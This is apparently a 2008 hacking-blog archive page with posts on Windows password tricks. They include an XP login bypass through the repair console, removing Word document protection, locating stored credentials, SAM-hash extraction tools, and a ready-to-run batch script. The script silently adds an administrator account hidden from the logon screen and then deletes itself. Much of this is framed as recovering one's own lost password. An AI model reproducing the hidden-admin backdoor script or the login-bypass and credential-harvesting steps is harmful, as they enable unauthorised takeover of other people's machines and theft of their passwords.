TrackSomebody.com

october27thgroup.com pentesting, pci, red team

illmob.org

Saved Password Locations

November 25th, 2008 by admin in Firefox, Password Info, Trillian, windows, Yahoo

Many people ask about the location in the Registry or file system that applications store the passwords. Here is a list of password storage locations for popular applications compiled by Nir Sofer.
Be aware that even if you know the location of the saved password, it doesn’t mean that you can move it from one computer to another. many applications store the passwords in a way that prevent you from moving them to another computer or user profile. (more…)

Change XP Password With Install CD

November 9th, 2008 by admin in News, Password Info, windows

If you forgot your Windows login password which contains your most valuable data with your all favorite setting and you fear about loosing all the data and settings? Then you don’t worry about this problem, if unfortunately you have this problem. Here is the best method to restore your Windows login password provided if you have the Windows installation CD.

1. Place your Windows XP CD in your cd-rom and start your computer (it’s assumed here that your XP CD is bootable – as it should be – and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your cd Typically, it will be “Press any key to boot from cd”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next – Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.

It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”

Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.

Remove Document Protection in Word

October 25th, 2008 by admin in Password Info, windows

Ever run into situation where someone sends you a read-only password protected Word document, but wants you to make changes?
Here’s how to crack it if you are using the newer versions of Word:

If you are using office XP or 2003, you can change the view to HTML-Code using Microsoft Script-Editor by pressing the [Alt]+[Shift]+[F11] key combination.

Search for “Password” and you will find somethimg like this:
<w:DocumentProtection>ReadOnly</w:DocumentProtection>
<w:UnprotectPassword>19E8E61E</w:UnprotectPassword>

To remove the protection:
-Just remowe those two lines, and after saving the document , the protection is gone.

To remove the password:
-replace the Password, here “19E8E61E”, with “00000000″, save the Document and close “Script-Editor”.

Alternative you can save your document as .html and use a html-Editor

Create A Hidden User on XP/VISTA

October 11th, 2008 by admin in Password Info, Uncategorized, windows

Nice little .bat script trick from illwill @ illmob.org that will create user who’s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It’s great for a backup account.

@echo off
rem HideUser.bat 
rem by illwill    http://illmob.org
rem This will create a hidden user with admin rights in XP/Vista
rem ( hidden meaning that the username wont appear in the logon screen)
rem change the illwill & passw0rd to your own
rem Add once you log into your new account dont forget to hide the user folder
rem "attrib +r +a +s +h %USERPROFILE%"


SET NEWUSER=adm1n
SET PASS=passw0rd

net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1
reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1
DEL %0

Access Stored User Names and Passwords Dialog

July 31st, 2008 by Dev Team in News, Password Info, windows

If you’ve ever saved a password when connecting to a website that requires authentication, for a remote desktop session or a mapped drive, you might have wondered where those passwords are saved. You can view these by going to the Start button then the Run dialog box and paste this:

rundll32.exe keymgr.dll, KRShowKeyMgr

or

control keymgr.dll

alternatively you can create a shortcut on your Desktop (more…)

SamRape 2.1

July 16th, 2008 by Dev Team in Files, News, Our Tools, Password Info, windows

Lost your password for NT,2K,XP,2K3?
illwill from illmob.org created a DOS based floppy that you can boot with that will mount an ntfs drive and extract the SAM hashes from an NT based system. You can then use any cracking software or free hash cracking sites to recover your lost password.
(more…)

How To Gain access to Windows Vista

June 16th, 2008 by Dev Team in Password Info, windows

Using BackTrack Live CD which can be found ::here::

For those of you who forgot your spiffy new Vista Logon password. Here’s a quick and dirty way to make a new user account. BTW, this has been around since XP but still useful.

(more…)

Windows Password Recovery Tools

March 13th, 2008 by Dev Team in Files, Password Info, windows

There are several ways to obtain password hashes, depending on their location and existing access. Password hashes can be obtained from SAM file or its backup, directly from local or remote computer registry, from registry or Active Directory on local or remote computer by means of DLL injection, from a network sniffer. The SAM file located in the %SystemRoot%\system32\config directory or %SystemRoot%\repair directory. It is also possible to recover the password itself from memory.

Here’s a few free tools to help you recover lost/unknown Windows passwords, most come with the source code included. (more…)

« Previous Article